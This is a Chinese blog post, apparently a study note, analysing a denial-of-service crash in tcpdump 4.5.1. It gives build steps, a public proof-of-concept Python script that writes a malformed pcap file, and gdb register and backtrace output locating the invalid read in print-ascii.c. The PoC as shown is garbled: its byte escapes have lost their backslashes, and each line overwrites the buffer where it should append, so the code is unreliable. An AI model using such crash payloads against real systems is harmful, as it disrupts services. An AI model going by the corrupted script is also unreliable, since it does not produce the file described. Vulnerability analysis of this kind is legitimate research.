tcpdump4.5.2拒绝服务漏洞

2023-02-28 12:49:00 浏览数 (2)

[二进制step1]TCPDUMP 4.5.2 拒绝服务漏洞分析

学习来源:

https://whereisk0shl.top/post/2016-10-23-1

https://bbs.kanxue.com/thread-261984.htm

环境

kali-linux-2022.4-vmware-i386 要x86的

下载链接

https://cdimage.kali.org/kali-2022.4/kali-linux-2022.4-vmware-i386.7z

之前用的这个Kali-Linux-2019.4-vmware-amd64安装一直报错,也有可能是网络的原因,下午换了镜像换了一个网络之后,环境和安装都很顺利

剩下步骤就按照参考的来

代码语言:javascript复制
# 卸载默认安装的tcpdump
apt-get --purge remove tcpdump  
# 安装依赖包
apt install flex
apt install bison
# 安装libpcap
wget http://www.tcpdump.org/release/libpcap-1.5.3.tar.gz
tar -zxvf libpcap-1.5.3.tar.gz
cd libpcap-1.5.3
./configure
make
make install
# 安装tcpdump
wget http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
tar -zxvf tcpdump-4.5.1.tar.gz
cd tcpdump-4.5.1
./configure
make
make install
# 验证安装
tcpdump --version

因为全新的环境没有调试工具记录下安装gdb和gdbpeda

代码语言:javascript复制
gdb
下载
wget http://ftp.gnu.org/gnu/gdb/gdb-11.2.tar.gz
解压
tar -zxvf gdb-11.2.tar.gz
生成makefile文件
./configure
检查文件
make
安装
sudo make install
验证
gdb -v

peda
git clone https://github.com/longld/peda.git ~/peda 
echo "source ~/peda/peda.py" >> ~/.gdbinit

调试

poc.py

代码语言:javascript复制
# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS
 
from subprocess import call
from shlex import split
from time import sleep
 
def crash():
 
    command = 'tcpdump -r crash'
 
    buffer     =   'xd4xc3xb2xa1x02x00x04x00x00x00x00xf5xff'
    buffer      =  'x00x00x00Ix00x00x00xe6x00x00x00x00x80x00'
    buffer      =  'x00x00x00x00x00x08x00x00x00x00<x9c7@xffx00'
    buffer      =  'x06xa0rx7fx00x00x01x7fx00x00xecx00x01xe0x1a'
    buffer      =  "x00x17g       x85xc9x03x00x00x00x10xa0&x80x18'"
    buffer      =  "xfe$x00x01x00x00@x0cx04x02x08n', 'x00x00x00x00"
    buffer      =  'x00x00x00x00x01x03x03x04'
 
    with open('crash', 'w b') as file:
        file.write(buffer)
 
    try:
        call(split(command))
        print("Exploit successful!             ")
    except:
        print("Error: Something has gone wrong!")
 
def main():
 
    print("Author:   David Silveiro                           ")
    print("   tcpdump version 4.5.1 Access Violation Crash    ")
 
    sleep(2)
    crash()
 
if __name__ == "__main__":
    main()

生成crash文件

代码语言:javascript复制
python2 poc.py

Exploit successful!  

crash文件内容

gdb执行tcpdump 然后执行run -r crash

代码语言:javascript复制
root@kali:~/tcpdump-dos# gdb tcpdump
 
gdb-peda$ run -r crash

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3 
EBX: 0x51cff4 --> 0x11ce70 
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5 
EDI: 0x0 
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846 
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset 156>:   movzx  esi,BYTE PTR [edx 0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x41a6bf <hex_and_ascii_print_with_offset 143>:      mov    eax,DWORD PTR [esp 0x14]
   0x41a6c3 <hex_and_ascii_print_with_offset 147>:      cmp    eax,0xffffffff
   0x41a6c6 <hex_and_ascii_print_with_offset 150>:      je     0x41a7c7 <hex_and_ascii_print_with_offset 407>
=> 0x41a6cc <hex_and_ascii_print_with_offset 156>:      movzx  esi,BYTE PTR [edx 0x1]
   0x41a6d0 <hex_and_ascii_print_with_offset 160>:      movzx  edi,BYTE PTR [edx]
   0x41a6d3 <hex_and_ascii_print_with_offset 163>:      add    edx,0x2
   0x41a6d6 <hex_and_ascii_print_with_offset 166>:      sub    esp,0xc
   0x41a6d9 <hex_and_ascii_print_with_offset 169>:      mov    DWORD PTR [esp 0x2c],edx
[------------------------------------stack-------------------------------------]                                                                          
0000| 0xbfffdb60 --> 0xf375846 
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f 
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0 
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5 
0020| 0xbfffdb74 --> 0x7ffef2b3 
0024| 0xbfffdb78 --> 0x0 
0028| 0xbfffdb7c --> 0x0 
[------------------------------------------------------------------------------]                                                                          
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "nt", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90                      s1 = *cp  ;

执行bt命令查看函数调用栈:

代码语言:javascript复制
gdb-peda$ bt
#0  hex_and_ascii_print_with_offset (ident=0x4aadef "nt", 
    cp=0x610000 <error: Cannot access memory at address 0x610000>, 
    length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
#1  0x0041a8d6 in hex_and_ascii_print (ident=0x4aadef "nt", 
    cp=0x5ee575 "3773773773476720340377377377377350'17360377377377377351263623403773773773773520636136037737737737735236632434037737737737735334632336037737737737735434021", length=0xfffffff3) at ./print-ascii.c:127
#2  0x0046dd13 in ndo_default_print (ndo=0x5ea9c0 <Gndo>, 
    bp=0x5ee575 "3773773773476720340377377377377350'17360377377377377351263623403773773773773520636136037737737737735236632434037737737737735334632336037737737737735434021", length=0xfffffff3) at ./tcpdump.c:2053
#3  0x0041850c in ieee802_15_4_if_print (ndo=0x5ea9c0 <Gndo>, h=0xbfffde10, 
    p=<optimized out>) at ./print-802_15_4.c:180
#4  0x0046e348 in print_packet (user=0xbfffdef0 "300251^", h=0xbfffde10, 
    sp=0x5ee560 "@377") at ./tcpdump.c:1950
#5  0x004905ef in pcap_offline_read (p=0x5ee350, cnt=0xffffffff, 
    callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "300251^")
    at ./savefile.c:409
#6  0x004808b3 in pcap_loop (p=0x5ee350, cnt=0xffffffff, 
    callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "300251^")
    at ./pcap.c:849
#7  0x004119b5 in main (argc=<optimized out>, argv=0xbffff0f4)
    at ./tcpdump.c:1569
#8  0xb7c23295 in ?? () from /lib/i386-linux-gnu/libc.so.6
#9  0xb7c23358 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#10 0x00412747 in _start ()
gdb-peda$ 

函数调用过程

_start ()

__libc_start_main() libc.so 6行

main tcpdump.c:1569

pcap_loop pcap.c:849

pcap_offline_read savefile.c:409

print_packet tcpdump.c:1950

ieee802_15_4_if_print print-802_15_4.c:180

ndo_default_print ./tcpdump.c:2053

hex_and_ascii_print ./print-ascii.c:127

hex_and_ascii_print_with_offset print-ascii.c:90

漏洞是打印时引用了非法地址

代码语言:javascript复制
gdb-peda$ s

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3 
EBX: 0x51cff4 --> 0x11ce70 
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5 
EDI: 0x0 
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846 
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset 156>:   movzx  esi,BYTE PTR [edx 0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x41a6bf <hex_and_ascii_print_with_offset 143>:      mov    eax,DWORD PTR [esp 0x14]
   0x41a6c3 <hex_and_ascii_print_with_offset 147>:      cmp    eax,0xffffffff
   0x41a6c6 <hex_and_ascii_print_with_offset 150>:      je     0x41a7c7 <hex_and_ascii_print_with_offset 407>
=> 0x41a6cc <hex_and_ascii_print_with_offset 156>:      movzx  esi,BYTE PTR [edx 0x1]
   0x41a6d0 <hex_and_ascii_print_with_offset 160>:      movzx  edi,BYTE PTR [edx]
   0x41a6d3 <hex_and_ascii_print_with_offset 163>:      add    edx,0x2
   0x41a6d6 <hex_and_ascii_print_with_offset 166>:      sub    esp,0xc
   0x41a6d9 <hex_and_ascii_print_with_offset 169>:      mov    DWORD PTR [esp 0x2c],edx
[------------------------------------stack-------------------------------------]                                                                          
0000| 0xbfffdb60 --> 0xf375846 
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f 
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0 
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5 
0020| 0xbfffdb74 --> 0x7ffef2b3 
0024| 0xbfffdb78 --> 0x0 
0028| 0xbfffdb7c --> 0x0 
[------------------------------------------------------------------------------]                                                                          
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "nt", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90                      s1 = *cp  ;
gdb-peda$ 

0 人点赞